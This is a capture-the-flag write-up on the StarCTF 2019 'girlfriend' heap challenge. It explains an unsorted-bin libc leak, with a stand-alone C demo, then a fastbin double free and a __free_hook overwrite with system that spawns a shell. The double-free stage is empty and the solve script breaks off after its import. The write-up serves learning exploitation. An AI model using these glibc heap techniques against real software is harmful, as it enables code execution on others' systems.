StarCTF 2019: girlfriend

I long for love, but also like single life. But it's a little difficult to find a girlfriend by playing CTF.

TL;DR

Classic libc leak via the unsorted bin (a read primitive), chained into a fastbin double free (a write primitive) that lets us overwrite __free_hook with system and get code execution.

Challenge Overview

This is a challenge from 2019, but I'm solving this in 2025 to learn more about heap exploitation.

Stage 1: LIBC Leak via Unsorted Bins
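The unsorted-bin leak in this stage can be reproduced on its own, without the challenge binary. The program below is an added example written for this write-up, not code from the original solution: it does what the challenge's allocate/free/view sequence does, in-process, against the running glibc. It assumes x86_64 Linux with glibc 2.26 or later (tcache present), and it reads /proc/self/maps to find which mapped object the leaked pointer falls into, which is the same "leak minus known offset equals libc base" arithmetic the exploit relies on.

```c
// Added example (not from the original write-up): Stage 1, the unsorted-bin
// libc leak, as a stand-alone C program. Assumes x86_64 Linux with glibc >= 2.26.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Allocate a chunk too large for tcache and fastbins (0x500 usable, 0x510
// chunk), allocate a guard so the victim cannot merge into the top chunk,
// then free the victim: it lands in the unsorted bin and glibc writes the
// address of the bin head (inside main_arena, in libc's .data) into its fd/bk.
// The fd sits at user-pointer offset 0, so a use-after-free read of the first
// 8 bytes (the challenge's "view" function) returns a pointer into libc.
unsigned long unsorted_bin_leak(void) {
    char *victim = malloc(0x500);
    char *guard  = malloc(0x500);     // keeps victim away from top, no consolidation
    if (!victim || !guard) return 0;
    memset(victim, 'A', 0x500);
    free(victim);                     // 0x510 > tcache max, so it goes to unsorted
    unsigned long leak = *(volatile unsigned long *)victim;   // fd of freed chunk
    return leak;
}

// Walk /proc/self/maps; if addr falls inside a mapping, return the base of the
// object that mapping belongs to (lowest address of its consecutive mappings)
// and copy its path into `path`. Returns 0 if addr is not mapped.
unsigned long module_base_of(unsigned long addr, char *path, size_t pathlen) {
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return 0;
    char line[512], cur[256] = "", p[256];
    unsigned long lo, hi, base = 0, found = 0;
    while (fgets(line, sizeof line, f)) {
        p[0] = '\0';                  // anonymous mappings carry no path
        if (sscanf(line, "%lx-%lx %*s %*s %*s %*s %255s", &lo, &hi, p) < 2)
            continue;
        if (strcmp(cur, p) != 0) {    // first mapping of a new object: its base
            strncpy(cur, p, sizeof cur - 1);
            cur[sizeof cur - 1] = '\0';
            base = lo;
        }
        if (addr >= lo && addr < hi) {
            strncpy(path, cur, pathlen - 1);
            path[pathlen - 1] = '\0';
            found = base;
            break;
        }
    }
    fclose(f);
    return found;
}

// Stage 1 end to end: leak, then resolve the leak to the C library's base.
// Returns 1 when the leaked pointer lies inside the libc mapping.
int leak_points_into_libc(unsigned long *base_out) {
    char path[256] = "";
    unsigned long leak = unsorted_bin_leak();
    unsigned long base = module_base_of(leak, path, sizeof path);
    if (base_out) *base_out = base;
    return base != 0 && strstr(path, "libc") != NULL;
}

int main(void) {
    unsigned long base = 0;
    int ok = leak_points_into_libc(&base);
    printf("leak lands in libc: %s, libc base = 0x%lx\n", ok ? "yes" : "no", base);
    return ok ? 0 : 1;
}
```

In the real exploit the base is not looked up in /proc/self/maps but computed as `leak - offset`, where the offset (the distance from the libc base to the unsorted-bin head in main_arena) is read off the challenge's libc with pwntools or gdb; the value differs per libc build, which is why the write-up ships against a specific libc.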

Stage 2: Double Free

Stage 3: Code Execution

According to this article, there are a couple of interesting targets we can consider overwriting, one of which is __free_hook. It only exists on glibc <= 2.33: the malloc hooks (__malloc_hook, __free_hook, and friends) were removed in glibc 2.34.

Once __free_hook is overwritten with the address of system, glibc's free() no longer releases the chunk: it sees a non-NULL hook and calls it with the pointer being freed, so free(ptr) becomes system(ptr). If we allocate a chunk, write the string /bin/sh into it, and free that chunk, the call is effectively system("/bin/sh") and we get a shell. Note that from the moment the hook is set every free() goes through system(), so the /bin/sh chunk should be the very next thing freed.

Solution

solve.py
#!/usr/bin/python

from pwn import *
